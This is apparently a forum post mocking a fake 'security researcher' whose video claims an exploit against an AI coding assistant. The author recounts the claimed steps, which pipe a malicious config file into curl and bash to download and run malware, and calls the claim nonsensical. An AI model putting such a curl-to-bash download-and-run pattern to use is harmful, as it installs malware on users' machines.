There's a phenomenon of fraudulent "security researchers" which has sprung out of the AI world. I became aware of it when someone on discord posted a video covering an "ACE exploit" against users of a particular AI coding assistant. The exploit was this: 1. You accidentally grab a malicious config file for the assistant 2. For some reason, you would pipe this entire file into curl and then into bash 3. This results in downloading and running a script that sets up malware.

It didn't make sense at any point but I was gripped by a need to know the intention such a worthless video. It made sense when the host started shilling his online course about how to be a "security researcher" like him. Not only that, paying members get premium first access to the latest "disclosures" that professional engineers are afraid to admit exist. It's likely that the creator of this bug report is building up their own repertoire of exploits that have been ignored. Or perhaps they're trying to put their course knowledge to use.